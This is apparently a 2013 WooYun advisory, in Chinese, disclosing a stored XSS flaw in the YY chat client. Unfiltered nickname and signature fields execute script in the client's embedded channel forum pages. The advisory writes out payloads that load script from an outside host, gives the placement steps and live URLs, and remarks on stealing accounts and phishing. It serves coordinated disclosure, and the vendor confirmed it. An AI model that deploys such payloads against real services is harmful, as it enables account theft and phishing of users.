当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-026675

漏洞标题:YY客户端缺陷导致存储型XSS漏洞

相关厂商:广州多玩

漏洞作者: random_

提交时间:2013-06-24 10:59

修复时间:2013-08-08 11:00

公开时间:2013-08-08 11:00

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-24: 细节已通知厂商并且等待厂商处理中
2013-06-24: 厂商已经确认,细节仅向厂商公开
2013-07-04: 细节向核心白帽子及相关领域专家公开
2013-07-14: 细节向普通白帽子公开
2013-07-24: 细节向实习白帽子公开
2013-08-08: 细节向公众公开

简要描述:

这个和qq的类似

详细说明:

和qq一样,yy的账户有昵称和签名。
qq客户端的和qq的web无缝连接,所以

">'>

这样的代码,在客户端里不会出现bug,但是直接出现在web就可以来xss了。详见:http://tmxk.org/thread-496-1-1.html。
yy犯了同样的错误。
yy的昵称为20字节不好构造,可行的代码,但已测试,没有过滤,极端情况下可以xss,如
<embed/src=//x.cn/x>,这样点击劫持、钓鱼足矣。
yy的签名则没有限制,直接上代码

<script/src=//tmxk.org/.js></script>


怎么让此处的代码出现在web里执行呢?

y1.png


1.我们到频道里测试。
首先我断定yy的频道里嵌入了web,这种思路是通用的,很多客户端都是这样,并可以查看web源码。我们ctrl+A复制当前,打开一个在线编辑器,ctrl+C,在编辑器的源码模式就可以看到复制web的源码了。

y2.png


要.png


通过这种方式我们可以知道签名的代码在web里是什么形态了。
2.我们先测试论坛,发帖,发现论坛的编辑器是富文本的,不是textarea,这个就可以插入富文本代码,但是因为嵌入的web,我又不能抓包,我还是通过上面的方式,找到了论坛的web页面,发现,富文本会过滤的。这是论坛url,http://y.duowan.com/channel2/52399485/index

y3.png


0x1.2我们把签名或昵称改成代码,重复同样操作。发现代码执行了。

y4.png


y5.png


这是对应的url,
http://y.duowan.com/channel2/getDetail?channelId=52399485&bbsZoneId=wEkJNgE-SR4&topicId=wEqk-d1-Pi7
http://y.duowan.com/channel2/getDetail?channelId=52399485&bbsZoneId=wEqixf--ONF&topicId=wEqiyVZ-OOB
这是在yy客户端里的执行情况

y6.png


我猜想,这个简单的浏览器果断有和脚本交互的接口,我没有耐心去找了。
3.这个只要是公会会员就可发帖,该公会的人看到就会中招。
盗个紫马不是屌丝梦。
结合游戏、音乐等功能,可以横行yy矣。

漏洞证明:

修复方案:

版权声明:转载请注明来源 random_@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-06-24 13:23

厂商回复:

感谢对于欢聚时代安全工作的支持,我们会尽快安排修复!谢谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-06-24 21:31 | Max ( 实习白帽子 | Rank:45 漏洞数:7 | When you see this sentence, I have been ...)

    我猜可能和我收藏的撞了。